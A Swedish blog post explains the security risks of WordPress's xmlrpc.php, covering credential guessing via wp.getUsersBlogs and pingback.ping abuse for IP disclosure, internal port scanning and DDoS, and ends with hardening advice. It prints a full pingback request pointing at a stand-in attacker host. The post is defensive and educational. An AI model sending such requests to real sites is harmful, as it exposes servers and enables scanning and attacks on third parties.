Skip to main content
  1. Blogposts/

Xmlrpc.php: wordpress dolda port đŸšȘ – din bĂ€sta vĂ€n eller fiende? đŸș

·856 words·5 mins· loading · · ·
Rasmus
Author
Rasmus
Att dela en ide eller tvÄ kan vara bra för hjÀrnan
Table of Contents

TĂ€nk dig en dörr. En vanlig, omĂ€rklig dörr i ett hus. Den ser inte ut att leda nĂ„gonstans, men om du vet var nyckeln ligger – eller om den Ă€r olĂ„st – kan den bli en hemlig genvĂ€g in. SĂ„ fungerar xmlrpc.php i WordPress. Den Ă€r byggd för att vara en kommunikationskanal, men ibland blir den en ovĂ€ntad risk. LĂ„t oss undersöka hur den hĂ€r “porten” fungerar, varför den kan vara farlig och hur du hĂ„ller den under kontroll.

Bakgrund: NĂ€r WordPress Fick en Telefonlinje ☎
#

FörestĂ€ll dig att WordPress Ă€r ett kontor med ett gĂ€ng flitiga anstĂ€llda. xmlrpc.php Ă€r som en gammal telefonvĂ€xel i hörnet – en teknik frĂ„n en tid dĂ„ apparater kommunicerade via XML istĂ€llet för modern JSON. Dess uppgift Ă€r att ta emot “samtal” frĂ„n externa tjĂ€nster: “Hej, jag vill publicera ett blogginlĂ€gg via mobilappen!” eller “Kan du skicka en ping nĂ€r nĂ„gon lĂ€nkar till din artikel?”

Problemet? Den hĂ€r vĂ€xeln svarar fortfarande pĂ„ alla som ringer – Ă€ven om de inte har legitima Ă€renden. Och precis som en telefonbedragare kan utnyttja en oskyddad linje, kan hackare anvĂ€nda xmlrpc.php för att smyga in om du inte vet hur den fungerar.

đŸ› ïž SĂ„ Kollar Du Om Porten Ă€r Öppen
#

För att se om din WordPress-installation svarar pÄ xmlrpc.php, behöver du bara en terminal och ett enkelt kommando:

curl -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>" http://din-site.se/xmlrpc.php

Det Ă€r som att knacka pĂ„ dörren och frĂ„ga “Vad kan du göra?”. FĂ„r du tillbaka en lista med metoder som wp.getUsersBlogs eller pingback.ping? DĂ„ Ă€r porten aktiv. Ingen panik – men det Ă€r dags att lĂ€ra dig vilka nycklar som passar i lĂ„set.

🔑 Logga In – Utan Att Logga In
#

HĂ€r blir det intressant. Med metoden wp.getUsersBlogs kan nĂ„gon försöka logga in genom att skicka anvĂ€ndarnamn och lösenord direkt till xmlrpc.php. Lyckas de, fĂ„r de tillbaka en bekrĂ€ftelse likt en triumferande “VĂ€lkommen in!”. Misslyckas de? DĂ„ fĂ„r de ett torrt “403 – Fel lösenord”.

Det lĂ„ter kanske harmlöst, men tĂ€nk pĂ„ detta: Varje inloggningsförsök via xmlrpc.php ger nĂ„gon en ny chans att prova lĂ„set – utan att trigga samma sĂ€kerhetsvarningar som vanliga inloggningar. För en angripare med en lista över vanliga anvĂ€ndarnamn kan detta bli en farlig kombination.

🎯 De Farligaste Metoderna – Och Varför Pingback Ă€r Som En TrojanhĂ€st
#

Alla XML-RPC-metoder Ă€r inte likvĂ€rdiga. pingback.ping Ă€r den mest lömska. Normalt anvĂ€nds den för att meddela “Hej, jag lĂ€nkade till din artikel!” till andra webbplatser. Men i fel hĂ€nder blir den ett vapen:

1. IP Avslöjande: Din Servers Hemliga Adress
#

Genom att be WordPress skicka en pingback till en server som angriparen kontrollerar, kan de se den riktiga IP-adressen för din server. Som att fĂ„ ett vykort med avsĂ€ndaradress frĂ„n nĂ„gon som gömmer sig – plötsligt vet de exakt var ditt “hus” ligger.

2. XSPA: Portscanning Genom en WordPress-Proxy
#

Med pingback.ping kan en angripare skicka din server pĂ„ Ă€renden till interna nĂ€tverk. “Kan du kolla om port 22 Ă€r öppen pĂ„ den hĂ€r adressen?” blir en frĂ„ga din server omedvetet besvarar. Det Ă€r som att ge nĂ„gon en fjĂ€rrstyrd stetoskop för att lyssna pĂ„ ditt nĂ€tverks hjĂ€rtslag.

3. DDoS: En Armé av Omedvetna WordPress-Soldater
#

Om en angripare kan övertala hundratals WordPress-sidor att samtidigt skicka pingbacks till ett mĂ„l, blir det en överbelastningsattack – som att skicka ett massivt budbiljettsupprop till en liten butik.

![[bild.png]] En visuell förenkling av hur en pingback-förfrÄgan kan anvÀndas för att avslöja en servers IP-adress.

🎭 Exemplet Som FĂ„r Dig Att Höja PĂ„ Ögonbrynen
#

SÄ hÀr kan en IP-avslöjande attack se ut i verkligheten:

POST /xmlrpc.php HTTP/1.1
Host: din-site.se
Content-Type: text/xml

<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://angriparen.se/</string></value></param>
    <param><value><string>https://din-site.se/en-artikel</string></value></param>
  </params>
</methodCall>

WordPress tar emot detta och tĂ€nker “Japp, jag ska höra med angriparen.se om de mĂ€rkte att jag lĂ€nkade till dem!”. I bakgrunden skickas en förfrĂ„gan till angriparens server – med din IP som avsĂ€ndare. Angriparen behöver bara titta i sin serverlogg för att hitta din adress.

đŸšȘ Hur Du StĂ€nger Porten – Eller SĂ€tter PĂ„ Ett BĂ€ttre LĂ„s
#

Jag kommer inte ge dig en punktlista med tekniska steg (det finns andra guider för det). Men tÀnk pÄ dessa principer:

  • Är xmlrpc.php nödvĂ€ndigt för dig? MĂ„nga moderna WordPress-anvĂ€ndare (t.ex. mobilappar) klarar sig idag utan det. Plugins som Disable XML-RPC kan stĂ€nga av det helt.
  • BegrĂ€nsa Ă„tkomsten genom brandvĂ€ggsregler eller .htaccess om du mĂ„ste ha det aktivt.
  • Övervaka misstĂ€nksam aktivitet – tusentals POST-förfrĂ„gningar till xmlrpc.php Ă€r aldrig ett bra tecken.

Slutord: En Port Ă€r Bara En Port – Tills NĂ„n AnvĂ€nder Den
#

xmlrpc.php Àr inte ond i sig sjÀlv. Den Àr en kvarleva frÄn en tid dÄ WordPress behövde kommunicera med fler system. Men som en gammal dörr som gnisslar i takt med moderna sÀkerhetsstandarder, krÀver den extra uppmÀrksamhet.

SĂ„ hĂ€r avslutar vi: Ta en kopp kaffe, öppna din favoritterminal och kör det enkla curl-kommandot ovan. Ser du en lista med metoder? DĂ„ vet du vad ditt nĂ€sta kvĂ€llsprojekt blir. Och om du redan har stĂ€ngt den hĂ€r porten – ge dig sjĂ€lv en klapp pĂ„ axeln. 🎉

Din WordPress-webbplats förtjÀnar att vara bÄde kraftfull och sÀker. VÀlj vilket som kommer först.

Introduktion
#

HuvudinnehÄll
#

Slutsats
#